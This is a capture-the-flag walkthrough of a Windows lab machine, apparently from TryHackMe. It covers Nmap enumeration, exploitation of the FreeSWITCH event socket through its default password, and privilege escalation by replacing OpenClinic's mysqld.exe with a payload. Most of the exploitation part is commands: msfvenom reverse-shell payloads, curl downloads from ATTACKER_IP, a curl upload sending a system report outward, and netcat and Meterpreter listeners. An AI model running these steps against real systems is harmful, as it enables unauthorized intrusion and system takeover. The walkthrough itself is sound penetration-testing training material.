Letβs add the target IP in the host file: /etc/host
sudonano/etc/host# Add the ipMACHINE_IPtarget.local
This machine takes up some time to boot up, be patient, it took me around 20 mins to figure out it wonβt respond to ping.
Enumeration
βI will hunt you downβ
Letβs first start scanning the machine with Nmap first, since it does not respond to ping, we will not use traditional flags for nmap, instead, we shall use TCP scans.
nmap-sCVT-p-target.local-Pn
# This might be the following output from the scanNmapscanreportfortarget.localHostisup,receiveduser-set (0.16s latency).Scannedat2023-02-0321:26:36ISTfor363sNotshown:65533filteredtcpports (no-response)PORTSTATESERVICEREASONVERSION3389/tcpopenms-wbt-serversyn-ackMicrosoftTerminalServices|ssl-cert:Subject:commonName=WIN-EOM4PK0578N|Issuer:commonName=WIN-EOM4PK0578N|PublicKeytype:rsa|PublicKeybits:2048|SignatureAlgorithm:sha256WithRSAEncryption|Notvalidbefore:2023-02-02T15:35:32|Notvalidafter:2023-08-04T15:35:32|MD5:b737fda0e13f6d7b23b9c899a285a3b4|SHA-1:f9ebe7c6b75232a12fdcae9bcb2493b206016b0c|-----BEGINCERTIFICATE-----|MIIC4jCCAcqgAwIBAgIQGIaArMRp4bVBxn4LTtO+zjANBgkqhkiG9w0BAQsFADAa|MRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wHhcNMjMwMjAyMTUzNTMyWhcNMjMw|ODA0MTUzNTMyWjAaMRgwFgYDVQQDEw9XSU4tRU9NNFBLMDU3OE4wggEiMA0GCSqG|SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDe/VIy17BE60cJyuy0DmRAc5WNzM32ywhi|nezlHDJauTM0qoRplDFH6Ma/V9FPh3SN1Zu6lpIdWbKrJyMAgoQbKLDQEa133Adm|hmcv0HYyc3B4uSEACdBeeX1NiHm0yo0ehIe0rXYxonXLkeNFCZkNDGWYypFHed4v|jqbsp2WgYLWwOXGcTHxgU/Hvn9173u8jeI8tnQByEsjmKwP1O4TvohgBOdfYKb9O|3PRWNm8rzDl4Ta7C+CmlCaUGyc+U1mTQyMgCJx+nA1v4hPYJ0ZgDOe1J5NMqxXJ+|n2AC4F0hO+/VwVuGCn0vaLh8W0KEqoJS37yw3z7xh+SH6f16vrypAgMBAAGjJDAi|MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF|AAOCAQEA3QJP+0ZugwkmUf/rPC0TS++1TX8y2eIqDxCLV6aQGvHUbMkFNRJfL2Qg|4toAbeYJfwrbmXZX1YMcTXBJKvHANKU06t6V7+YSm3HzwcVvKtHc4sOSu+tl6FxR|sSWJAc++0wv9KjgQh+kyl5yIpI+kfbNrsF/xtTEVRfQ/SaZhlPlnklb/5a+qz8N2|TIdalDvX65E6WYCiSLoBf+bcfzSuLu245NoNkizksXN7HSl1SjLGnIuebty0q1id|zj9UKWQcco24ssXyMrLgY5PfI7P1y1jpAz/mR+g0ocFTk1kqzS9gAhtaAb2hUEc7|CxFf8VS8S5mrhn51/fOXleY2JERz/w==|_-----ENDCERTIFICATE-----|rdp-ntlm-info:|Target_Name:WIN-EOM4PK0578N|NetBIOS_Domain_Name:WIN-EOM4PK0578N|NetBIOS_Computer_Name:WIN-EOM4PK0578N|DNS_Domain_Name:WIN-EOM4PK0578N|DNS_Computer_Name:WIN-EOM4PK0578N|Product_Version:10.0.17763|_System_Time:2023-02-03T16:02:35+00:00|_ssl-date:2023-02-03T16:02:40+00:00; +1sfromscannertime.8021/tcpopenfreeswitch-eventsyn-ackFreeSWITCHmod_event_socketServiceInfo:OS:Windows; CPE:cpe:/o:microsoft:windowsHostscriptresults:|_clock-skew:mean:0s,deviation:0s,median:0s
It's intriguing that there are only a few open ports, and they seem to have tight restrictions on their functionality. One of these ports is 3389, where 'ms-bt-server' is running. A simple Google search for 'ms-bt-server' yields a helpful Nmap command that can be employed to assess its potential exploitability.
nmap--script"rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info"-p3389-T4target.local-Pn# Here is the output for the nmap enumeration via the RDP scriptPORTSTATESERVICE3389/tcpopenms-wbt-server|rdp-enum-encryption:|Securitylayer|CredSSP (NLA): SUCCESS|CredSSPwithEarlyUserAuth:SUCCESS|_RDSTLS:SUCCESS
It performs checks for available encryption, potential DoS vulnerabilities (without causing a DoS), and gathers NTLM Windows information, including versions.
Regarding the RDP service, the password spraying method could be an option, but we lack both a username and password in this lab environment. Caution should be exercised, as using the password spraying method in real-life scenarios without proper credentials can lead to blockages.
Instead, let's explore the FreeSWITCH service running on port 8021. FreeSWITCH is a free and open-source server software designed for real-time communication applications like WebRTC, video, and Voice over Internet Protocol (VoIP). It's versatile, compatible with Linux, Windows, macOS, and FreeBSD.
Weaponization
βLock and Loadβ
A quick search in the msfconsole regarding FreeSWITCH led to some intriguing findings. If you plan to switch to that module, you'll discover that the default password being used is 'ClueCon.' Now, let's attempt to netcat the service. Given that it's a terminal-based service, this approach should work effectively.
msf> searchfreeswitch# Search results might give you this particular result# Name Disclosure Date Rank Check Description---------------------------------------- 0 exploit/multi/misc/freeswitch_event_socket_cmd_exec 2019-11-03 excellent Yes FreeSWITCH Event Socket Command Execution
# To generate a msfvenom shellmsfvenom-pwindows/x64/meterpreter_reverse_tcpLHOST=ATTACKER_IPLPORT=9999-fexe-oreverse.exe# Start the python webserverpython-mhttp.server8080# Deliver the exploitpythonexp.pytarget.local'curl http://ATTACKER_IP:8080/reverse.exe -o rev.exe'# Start a Meterpreter sessionmsfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter_reverse_tcp; set lhost ATTACKER_IP; set lport 9999; exploit"
# Finaly execute the exploitpythonexp.pytarget.local'rev.exe'# You should be able to receive the session in msfconsole
# Switch to the shellmeterpreter> shell
Exploitation
βAccess Grantedβ
Letβs get the flag now
C:\Users\Nekrotic\Desktop>dirVolumeindriveChasnolabel.VolumeSerialNumberis84FD-2CC9DirectoryofC:\Users\Nekrotic\Desktop09/11/202107:39<DIR>.09/11/202107:39<DIR>..09/11/202107:3938root.txt09/11/202107:3938user.txt2File(s) 76bytes2Dir(s) 50,111,950,848bytesfree# Get the flagtypeuser.txt# OutputTHM{64bca084_REDACTED}
Now We need to escalate Privileges else we wonβt be able to get the root flag
Letβs deploy peas-ng for windows
# Deploy Peas-NGcdC:\Users\Nekroticcurlhttp://ATTACKER_IP:8080/winPEASany_ofs.exe-Owin.exe# Execute and make a report of the systemwin.exe>report.txt# Let's exfiltrate the file to get an overview of the system and what we are dealing with# We will use curl# It might take some time cause of file size curl--upload-filereport.txthttp://10.17.6.255:69
By the way, there is a βprojectsβ folder in C drive that you might want to check
09/11/202107:18<DIR>projects# Upon closer inspection we can findDirectoryofC:\projects\openclinic09/11/202107:29<DIR>.09/11/202107:29<DIR>..06/04/202122:14250configureCountry.bat01/07/202117:20167configureLanguage.bat09/11/202107:29<DIR>jdk1.809/11/202107:18334,840lua5.1.dll09/11/202107:19<DIR>mariadb07/06/202115:5893,696OpenClinicGAlogin.exe08/05/202011:1727,136OpenClinicStartServices.exe01/05/202123:45316stopOpenClinicHttp.bat09/11/202107:30<DIR>tomcat809/11/202107:29<DIR>Uninstall09/11/202107:181,389,568uninstall.exe7File(s) 1,845,973bytes6Dir(s) 50,207,125,504bytesfree# The user seems to be using mysql as well, later on we can check for sensitive data in the database as well if we want to.
Since we know the user is running openclinic we can search for exploits against it
Privilege Escalation
βI am inevitableβ
searchsploitopenclinic# Output-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Escalation | windows/local/50448.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
# Let's see what the exploit is all about cat $(locate50448.txt)# Details# By default the Authenticated Users group has the modify permission to openclinic folders/files as shown below.# A low-privilege account is able to rename mysqld.exe or tomcat8.exe files located in bin folders and replace# with a malicious file that would connect back to an attacking computer giving system-level privileges# (nt authority\system) due to the service running as Local System.# While a low-privilege user is unable to restart the service through the application, a restart of the# computer triggers the execution of the malicious file.# Any low-privileged user can elevate their privileges by abusing the MariaDB service:
Wooho!! let's see if we can get root on this machine, using the methods listed.
# Generate the payload firstmsfvenom-pwindows/shell_reverse_tcpLHOST=ATTACKER_IPLPORT=6969-fexe>mysqld_evil.exe# Inside victim machinecdC:\projects\openclinic\mariadb\bin# Create a backup of original mysqld.exerenmysqld.exemysqld.bak# Deploy the payloadcurlhttp://ATTACKER_IP:8080/mysqld_evil.exe-omysqld.exe# Start Netcat listner on your local machinenc-lvnp6969# Restart the victim computer from the previous shellpowershellRestart-Computer# Now wait for the magic to happen
After a few moments, you shall receive the connection in your netcat listner
C:\Windows\system32>whoamiwhoamintauthority\system# We got root# Get the Root FlagtypeC:\Users\Nekrotic\Desktop\root.txt# OutputTHM{8c8bc5558f0f_REDACTED}
Thank you for reading my post, have a great rest of your day, and good hunting π
